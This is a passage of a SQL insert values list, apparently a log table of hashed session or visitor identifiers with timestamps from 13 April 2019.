(78205, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:29:21'),
(78206, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:29:30'),
(78207, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:29:47'),
(78208, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:30:11'),
(78209, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:30:38'),
(78210, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:30:43'),
(78211, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:30:52'),
(78212, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:31:04'),
(78213, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:31:05'),
(78214, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:31:23'),
(78215, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:31:33'),
(78216, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:31:46'),
(78217, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:32:21'),
(78218, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:32:24'),
(78219, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:32:41'),
(78220, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:32:59'),
(78221, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:33:09'),
(78222, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-13 00:33:16'),
(78223, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:33:24'),
(78224, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:33:37'),
(78225, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:33:39'),
(78226, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:33:54'),
(78227, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:33:57'),
(78228, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:34:03'),
(78229, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:34:14'),
(78230, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:34:15'),
(78231, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:34:37'),
(78232, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:34:37'),
(78233, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:34:52'),
(78234, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:35:01'),
(78235, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:35:05'),
(78236, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:35:17'),
(78237, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 00:35:30'),
(78238, 'a56b1115ae86e8ce3b154776184feb10', '12ed21842ec29d17', 0, 2, 1, '2019-04-13 00:35:34'),
(78239, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 00:36:33'),
(78240, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-13 00:36:50'),
(78241, 'd0af81e2f140e0891d500ccbe5dcf5aa', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 00:37:04'),
(78242, 'dfbd07bb1d4d673b8a7c5164f0598356', 'b0f65a65ff17466b', 0, 2, 1, '2019-04-13 00:46:45'),
(78243, '81222e627c41318fe1e99779cec9146b', '3affdb6d237dd814', 0, 2, 1, '2019-04-13 00:51:18'),
(78244, '81222e627c41318fe1e99779cec9146b', '3affdb6d237dd814', 0, 2, 1, '2019-04-13 00:51:28'),
(78245, 'e38bead9b2df5641a6fb32d0a098fa89', '734d5b1d2aa61b92', 0, 2, 1, '2019-04-13 00:55:53'),
(78246, 'fd661bc408d54729ecd5fbb3efcd545a', '0e648495ff86ba16', 0, 2, 1, '2019-04-13 01:10:57'),
(78247, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-13 01:17:18'),
(78248, 'bc37e0b13334629a7db5cf5c3df89f81', '1856a5463c81316d', 0, 2, 1, '2019-04-13 01:23:49'),
(78249, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 01:24:38'),
(78250, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 01:25:11'),
(78251, '6826f4a637c84800427a7778c976bfbe', 'b29b7ee63c0333b0', 0, 2, 1, '2019-04-13 02:05:22'),
(78252, '95ddba8a3c6d68915a84393aae9196bf', '5e1dd91b426ab341', 0, 2, 1, '2019-04-13 03:06:59'),
(78253, 'b4ca38926a3c35a2b0f005d9e1a89e8a', '4388484f2bc9629f', 0, 2, 1, '2019-04-13 03:09:36'),
(78254, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:52:31'),
(78255, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:52:43'),
(78256, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:53:03'),
(78257, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:53:18'),
(78258, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:54:33'),
(78259, '605937fdad29de5511748ce6d4c26df0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-13 03:54:47'),
(78260, '7e0c0eaa986f707ed91c27163762e5ab', '196ae7616c94df27', 0, 2, 1, '2019-04-13 04:15:18'),
(78261, '64b6dbeb44679d0faaa85ebdf5094832', 'f3f9aa94e997f42d', 0, 2, 1, '2019-04-13 05:23:18'),
(78262, '31286adb459be08a8097de81142f15a3', '26099a3e13cd1f89', 0, 2, 1, '2019-04-13 05:55:06'),
(78263, '31286adb459be08a8097de81142f15a3', '26099a3e13cd1f89', 0, 2, 1, '2019-04-13 05:55:27'),
(78264, 'd7343b0524aac22e3c8337c405302b1e', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-13 06:18:44'),
(78265, '6a9022cdb9f13add96262de1b9ce214e', '553b9f0a18b97af8', 0, 2, 1, '2019-04-13 06:47:07'),
(78266, '7eaf1e79ab78d209e7d84ff454961fca', '8f9934b3fd574f10', 0, 2, 1, '2019-04-13 07:00:52'),
(78267, '61375d27f19fc6131326844a56dcc40e', 'adb47cc444d8192c', 0, 2, 1, '2019-04-13 07:29:46'),
(78268, '7723554c39800ed0ed7d5061e59d8124', '945e9239c2b9bc56', 0, 2, 1, '2019-04-13 07:53:11'),
(78269, '9f89f546c4a3b7c38a222f543def2f40', 'bfa261179e71fb89', 0, 2, 1, '2019-04-13 08:02:38'),
(78270, '74b5e0f67b81f791ba0ecfd14e33352a', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 08:10:18'),
(78271, '45cc319fb6cd5bcfa43081f4c568e809', '8e77fdc2726ca776', 0, 2, 1, '2019-04-13 08:12:50'),
(78272, '74b5e0f67b81f791ba0ecfd14e33352a', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 08:14:44'),
(78273, '74b5e0f67b81f791ba0ecfd14e33352a', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 08:14:49'),
(78274, '74b5e0f67b81f791ba0ecfd14e33352a', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 08:14:58'),
(78275, '81449c22f8eb3797e3f2048a03642e88', '22f43a16a511f701', 0, 2, 1, '2019-04-13 08:23:15'),
(78276, '81449c22f8eb3797e3f2048a03642e88', '22f43a16a511f701', 0, 2, 1, '2019-04-13 08:23:24'),
(78277, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 08:24:37'),
(78278, '972146135648e7760b6bb85908afd9f4', 'a1dee1f64a7df881', 0, 2, 1, '2019-04-13 08:24:46'),
(78279, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 08:27:08'),
(78280, 'e1d071c6e4de36b52377f4c9c9d5eb5c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-13 08:27:35'),
(78281, 'b6af8a0ef7666d35e623efd79540dae9', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-04-13 08:48:17'),
(78282, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 08:48:17'),
(78283, 'b6af8a0ef7666d35e623efd79540dae9', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-04-13 08:48:57'),
(78284, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:04:41'),
(78285, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:05:21'),
(78286, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:06:05'),
(78287, '5bac8d9bba269d654de40ffbf78d6003', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-13 09:06:08'),
(78288, '4a9bdfd78b073f3093f4d50b2596ca77', '307bbe088f24e4d6', 0, 2, 1, '2019-04-13 09:12:50'),
(78289, '5dfeaae5dc6f62dd3d095c55b6e0f353', '1c68b977b911188c', 0, 2, 1, '2019-04-13 09:13:46'),
(78290, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:15:27'),
(78291, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:16:07'),
(78292, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:17:45'),
(78293, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 09:19:59'),
(78294, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:20:30'),
(78295, '9b77e83242e32645ace3951377cb0267', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-13 09:22:25'),
(78296, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:26:10'),
(78297, '66f4dea4bfac4edc624990ac7dfdfd05', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-13 09:34:02'),
(78298, '98f4d7f3922e4fa015945c728110ed68', 'df27b9a2919a8206', 0, 2, 1, '2019-04-13 09:40:31'),
(78299, '4a42767259021c09ecbab4d3fb97af50', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:41:42'),
(78300, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 09:41:43'),
(78301, '4a42767259021c09ecbab4d3fb97af50', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:41:55'),
(78302, '4a42767259021c09ecbab4d3fb97af50', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:42:11'),
(78303, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:48:00'),
(78304, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:48:30'),
(78305, '0ef0aaa5292941feb633baa472ebbbc2', '624d6937076d1188', 0, 2, 1, '2019-04-13 09:48:34'),
(78306, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 09:48:45'),
(78307, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:49:05'),
(78308, '4a42767259021c09ecbab4d3fb97af50', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:49:14'),
(78309, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:49:19'),
(78310, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:49:33'),
(78311, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:49:39'),
(78312, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 09:49:45'),
(78313, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:49:45'),
(78314, 'cf112f92462666d1524c2f5c89cf11aa', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:50:04'),
(78315, 'cf112f92462666d1524c2f5c89cf11aa', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:50:11'),
(78316, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:50:12'),
(78317, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:50:34'),
(78318, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:50:40'),
(78319, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:51:07'),
(78320, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 09:51:07'),
(78321, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:51:19'),
(78322, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:51:27'),
(78323, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:51:39'),
(78324, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 09:51:46'),
(78325, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:51:51'),
(78326, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:52:06'),
(78327, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-04-13 09:52:19'),
(78328, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:52:25'),
(78329, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-04-13 09:52:40'),
(78330, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:52:48'),
(78331, '808b646fbed64c02c5745eb7b42cd313', '4e77cbfd931e2644', 0, 2, 1, '2019-04-13 09:52:59'),
(78332, '808b646fbed64c02c5745eb7b42cd313', '4e77cbfd931e2644', 0, 2, 1, '2019-04-13 09:53:08'),
(78333, '0b884eaafdb004dd6ce2ea99895dcbf9', '4aba70faa7722502', 0, 2, 1, '2019-04-13 09:53:27'),
(78334, 'cf112f92462666d1524c2f5c89cf11aa', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:53:31'),
(78335, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:53:33'),
(78336, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:53:55'),
(78337, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:54:18'),
(78338, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:54:31'),
(78339, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:55:06'),
(78340, '135ce191e85d498dda84a818968d8ccf', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:55:20'),
(78341, 'cf112f92462666d1524c2f5c89cf11aa', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:55:50'),
(78342, 'd7c018087bf0d093a2fd399933203753', '4183c989caa86006', 0, 2, 1, '2019-04-13 09:55:58'),
(78343, '7e3fd9213a8ce15fd45c5af7ffffbdb9', '0b83b588375e9508', 0, 2, 1, '2019-04-13 09:56:05'),
(78344, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 09:56:05'),
(78345, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:56:10'),
(78346, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:56:15'),
(78347, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 09:56:27'),
(78348, 'cf112f92462666d1524c2f5c89cf11aa', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 09:56:42'),
(78349, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 09:57:06'),
(78350, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:57:16'),
(78351, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:57:36'),
(78352, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 09:57:56'),
(78353, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 09:58:00'),
(78354, 'b6af8a0ef7666d35e623efd79540dae9', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-04-13 09:58:34'),
(78355, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 09:58:53'),
(78356, 'a63e591ff6ff1a48e6b17e2e6f244b68', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 09:59:01'),
(78357, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 09:59:14'),
(78358, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 10:02:14'),
(78359, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 10:02:59'),
(78360, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:05:36'),
(78361, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:10:21'),
(78362, 'a63e591ff6ff1a48e6b17e2e6f244b68', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:10:41'),
(78363, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:11:00'),
(78364, '4ead67c9ca2e341af01652a8d874386a', '8e9a16956483f85e', 0, 2, 1, '2019-04-13 10:11:05'),
(78365, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:11:30'),
(78366, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:11:47'),
(78367, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:12:11'),
(78368, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:12:12'),
(78369, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:12:33'),
(78370, 'a63e591ff6ff1a48e6b17e2e6f244b68', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:13:02'),
(78371, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:14:25'),
(78372, '56956d3f4d16fb2858ac10d6c666f8a5', '29ef45db200a8f59', 0, 2, 1, '2019-04-13 10:14:42'),
(78373, 'daf0067ce9f32afcfc25bbce5b3a2d4b', 'df673342c2c2d34b', 0, 2, 1, '2019-04-13 10:14:51'),
(78374, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:15:07'),
(78375, '56956d3f4d16fb2858ac10d6c666f8a5', '29ef45db200a8f59', 0, 2, 1, '2019-04-13 10:15:07'),
(78376, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:15:49'),
(78377, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:15:57'),
(78378, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:16:27'),
(78379, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:16:35'),
(78380, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:17:03'),
(78381, '56956d3f4d16fb2858ac10d6c666f8a5', '29ef45db200a8f59', 0, 2, 1, '2019-04-13 10:17:13'),
(78382, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:17:30'),
(78383, '56956d3f4d16fb2858ac10d6c666f8a5', '29ef45db200a8f59', 0, 2, 1, '2019-04-13 10:17:54'),
(78384, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:18:00'),
(78385, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:18:17'),
(78386, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:18:41'),
(78387, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 10:19:38'),
(78388, '7856cd98a9fc1c0a44e2d3674049ac30', 'c344782cf31b19b4', 0, 2, 1, '2019-04-13 10:20:08'),
(78389, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:20:17'),
(78390, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:20:44'),
(78391, 'b21391796f640776ede43cb859ce3d92', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 10:21:00'),
(78392, 'b21391796f640776ede43cb859ce3d92', '2487dcc4e2703639', 0, 2, 1, '2019-04-13 10:21:09'),
(78393, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:22:48'),
(78394, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:22:49'),
(78395, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:22:59'),
(78396, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 10:23:13'),
(78397, 'f2d56adef8f2c3cbc2891bc82d4d50c8', '324d0c5c1f480926', 0, 2, 1, '2019-04-13 10:23:30'),
(78398, 'aa995930ae8c48412742ee0a9ab9effd', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:23:40'),
(78399, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-13 10:23:51'),
(78400, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:24:18'),
(78401, '4a2a03d3aed6924ec6b3d7107c34d53b', '6f8a260dd974c75c', 0, 2, 1, '2019-04-13 10:24:47'),
(78402, '1cfba3efabe7fd1a54ab5f297046bdaf', '96838f2a075a32df', 0, 2, 1, '2019-04-13 10:25:48'),
(78403, 'aa995930ae8c48412742ee0a9ab9effd', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:27:32'),
(78404, 'aa995930ae8c48412742ee0a9ab9effd', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:31:09'),
(78405, '7ceeec8916f49f904bd9b39322e5a8a7', '9d7b426918346c58', 0, 2, 1, '2019-04-13 10:32:14'),
(78406, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:36:43'),
(78407, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:37:09'),
(78408, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:38:40'),
(78409, '5dfeaae5dc6f62dd3d095c55b6e0f353', '1c68b977b911188c', 0, 2, 1, '2019-04-13 10:40:24'),
(78410, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:40:53'),
(78411, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:41:56'),
(78412, '262ae7452a5f138652e0cbb7a06850b9', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-13 10:51:03'),
(78413, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:54:23'),
(78414, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:54:40'),
(78415, '5dfeaae5dc6f62dd3d095c55b6e0f353', '1c68b977b911188c', 0, 2, 1, '2019-04-13 10:54:52'),
(78416, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:55:00'),
(78417, 'e51b482dbcaf4dc7d243462fc311e375', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:55:11'),
(78418, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:55:56'),
(78419, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:57:02'),
(78420, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:57:41'),
(78421, 'fdb732ee9e4b2eb2e994cc90bd5bef36', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:57:42'),
(78422, 'fdb732ee9e4b2eb2e994cc90bd5bef36', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:57:57'),
(78423, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 10:58:24'),
(78424, 'fdb732ee9e4b2eb2e994cc90bd5bef36', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:58:29'),
(78425, '27930195c32c09a997d745816ca709a7', 'd131b6333aa3bbcb', 0, 2, 1, '2019-04-13 10:58:40'),
(78426, '0094c1d54857652672281ccea49657c1', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-13 10:58:57'),
(78427, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 10:59:11'),
(78428, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 10:59:27'),
(78429, 'fdb732ee9e4b2eb2e994cc90bd5bef36', '6d8c93203d1bd217', 0, 2, 1, '2019-04-13 10:59:39'),
(78430, 'a6030377338c24593a4a2be36973d522', '162df1438b07f242', 0, 2, 1, '2019-04-13 10:59:42'),
(78431, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-13 10:59:48'),
(78432, '6107b3dc74c082946366f0face458c22', 'fac4f66e13395980', 0, 2, 1, '2019-04-13 10:59:54'),
(78433, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-13 11:00:35'),
